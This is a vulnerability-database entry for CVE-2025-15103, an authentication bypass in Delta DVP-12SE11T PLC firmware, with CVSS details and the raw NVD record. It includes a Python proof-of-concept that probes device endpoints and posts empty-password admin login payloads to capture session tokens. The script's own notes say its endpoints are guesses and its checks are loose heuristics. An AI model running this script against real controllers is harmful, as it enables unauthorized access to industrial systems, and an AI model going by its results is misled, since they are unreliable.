Security Vulnerability Report
CVE-2025-15103 CVSS 8.1 HIGH

CVE-2025-15103

Published: 2025-12-30 09:15:52
Last Modified: 2026-01-06 21:04:55
Source: 759f5e80-c8e1-4224-bead-956d7b33c98b

Description

DVP-12SE11T - Authentication Bypass via Partial Password Disclosure

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
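CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: the score shown here is the Secondary metric supplied by the record's source. The raw JSON record below also carries a Primary metric, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, with base score 9.8 CRITICAL; the two vectors differ only in attack complexity.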

Configurations (Affected Products)

cpe:2.3:o:deltaww:dvp-12se11t_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:deltaww:dvp-12se11t:-:*:*:*:*:*:*:* - NOT VULNERABLE
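Delta DVP-12SE11T firmware versions earlier than the fixed release (the CPE match data in the raw JSON below gives versionEndExcluding 2.16)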

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
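#!/usr/bin/env python3
"""
CVE-2025-15103 PoC - Delta DVP-12SE11T Authentication Bypass

This PoC demonstrates the authentication bypass vulnerability in
Delta DVP-12SE11T PLC devices.

Note: This code is for educational and authorized security testing purposes only.

Reviewer notes:
  * The CVE record published with this script gives only the title
    "Authentication Bypass via Partial Password Disclosure" and CWE-200.
    The endpoint paths and request bodies below do not appear in that
    record. NOTE(review): they look like generic guesses; confirm against
    the vendor advisory (Delta-PCSA-2025-00022) before relying on any result.
  * Both checks are substring heuristics ('password'/'pwd' in a 200 body,
    'token' in a 200 body), so false positives and false negatives are
    expected. A 'not_vulnerable_or_protected' result is not evidence that
    a device is patched; compare the installed firmware version with the
    affected range in the CVE record (versions before 2.16).
  * For detection: one run issues five GETs to the listed paths followed
    by up to three POSTs to /api/auth/login from a single source, with the
    default python-requests User-Agent unless the caller overrides it.
"""

import requests
import sys
import json

# Keys under result['details'] whose values may hold credential material.
_SENSITIVE_DETAIL_KEYS = ('response_preview', 'session_token')


def exploit_auth_bypass(target_ip, target_port=80):
    """
    Attempt to exploit CVE-2025-15103 authentication bypass vulnerability.

    Args:
        target_ip: Target device IP address
        target_port: Target device port (default: 80)

    Returns:
        dict: Exploitation result with keys 'vulnerability', 'target',
        'status' and 'details'. 'status' is 'vulnerable' when a POST to
        /api/auth/login returns HTTP 200 with the substring 'token' in the
        body, otherwise 'not_vulnerable_or_protected'. 'details' may hold
        'password_disclosure_endpoint', 'response_preview' (first 500
        characters of a matching response), 'bypass_method' and
        'session_token'. The last two of those values can contain secrets,
        so callers should not log the dict verbatim.
    """
    result = {
        'vulnerability': 'CVE-2025-15103',
        'target': f'{target_ip}:{target_port}',
        'status': 'unknown',
        'details': {}
    }

    # Plain HTTP only; the scheme is hard-coded.
    base_url = f'http://{target_ip}:{target_port}'

    # Step 1: Information gathering - enumerate accessible endpoints
    endpoints = [
        '/api/system/info',
        '/api/auth/login',
        '/api/config/password',
        '/cgi-bin/login.cgi',
        '/api/user/list'
    ]

    print(f"[*] Starting CVE-2025-15103 exploitation on {target_ip}:{target_port}")

    for endpoint in endpoints:
        try:
            response = requests.get(f'{base_url}{endpoint}', timeout=5)
            if response.status_code == 200:
                print(f"[+] Endpoint {endpoint} accessible - Status: {response.status_code}")

                # Step 2: Check for password disclosure in response
                # Substring match only: an ordinary login form containing the
                # word "password" satisfies it as well.
                if 'password' in response.text.lower() or 'pwd' in response.text.lower():
                    print(f"[!] Potential password information found at {endpoint}")
                    # A later match overwrites an earlier one; only the last
                    # matching endpoint is kept.
                    result['details']['password_disclosure_endpoint'] = endpoint
                    result['details']['response_preview'] = response.text[:500]
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {str(e)}")

    # Step 3: Attempt authentication bypass with partial credentials
    # All three dicts are posted as JSON bodies. The third carries a Basic
    # auth value (base64 of "admin:") as a body field, not as a header.
    bypass_payloads = [
        {'username': 'admin', 'password': ''},
        {'username': 'admin', 'password': 'partial_credential'},
        {'Authorization': 'Basic YWRtaW46'}
    ]

    print("[*] Attempting authentication bypass techniques...")

    for i, payload in enumerate(bypass_payloads, 1):
        try:
            response = requests.post(
                f'{base_url}/api/auth/login',
                json=payload,
                headers={'Content-Type': 'application/json'},
                timeout=5
            )

            # Heuristic: any 200 body containing "token" counts as success,
            # including pages that merely mention the word.
            if response.status_code == 200 and 'token' in response.text:
                print(f"[!] Authentication bypass successful with payload {i}")
                result['status'] = 'vulnerable'
                result['details']['bypass_method'] = f'Payload {i}'
                # response.json() raises on a non-JSON body; the broad except
                # below reports that as a failed attempt.
                result['details']['session_token'] = response.json().get('token', 'N/A')
                return result
        except Exception as e:
            print(f"[-] Bypass attempt {i} failed: {str(e)}")

    # Reached when no POST matched the heuristic, including when every
    # request failed with a network error.
    result['status'] = 'not_vulnerable_or_protected'
    return result


def _redact_for_display(result):
    """Return a copy of *result* with secret-bearing detail values masked."""
    shown = dict(result)
    details = dict(result.get('details', {}))
    for key in _SENSITIVE_DETAIL_KEYS:
        if key in details:
            details[key] = f'<redacted, {len(str(details[key]))} chars>'
    shown['details'] = details
    return shown


def main():
    """
    Command-line entry point: parse <target_ip> [port], run the check and
    print the result as JSON.

    The port argument is validated so a bad value yields a clear message
    instead of a traceback, and response previews and session tokens are
    masked in the printed output so they do not end up in terminal
    scrollback or captured logs.
    """
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_15103_poc.py <target_ip> [port]")
        print("Example: python cve_2025_15103_poc.py 192.168.1.100 80")
        sys.exit(1)

    target_ip = sys.argv[1]

    if len(sys.argv) > 2:
        try:
            target_port = int(sys.argv[2])
        except ValueError:
            print(f"[-] Invalid port: {sys.argv[2]!r}")
            sys.exit(1)
        if not 1 <= target_port <= 65535:
            print(f"[-] Port out of range (1-65535): {target_port}")
            sys.exit(1)
    else:
        target_port = 80

    result = exploit_auth_bypass(target_ip, target_port)

    print("\n[*] Exploitation complete. Result:")
    print(json.dumps(_redact_for_display(result), indent=2))


if __name__ == '__main__':
    main()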

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15103", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2025-12-30T09:15:52.463", "lastModified": "2026-01-06T21:04:54.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DVP-12SE11T - Authentication Bypass via Partial Password Disclosure"}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:deltaww:dvp-12se11t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.16", "matchCriteriaId": "0C3C10A0-095C-42AE-BDC7-031777E1D92B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:deltaww:dvp-12se11t:-:*:*:*:*:*:*:*", "matchCriteriaId": "8064F0CC-BFDB-4E4B-8E20-437BA4663972"}]}]}], "references": [{"url": 
"https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}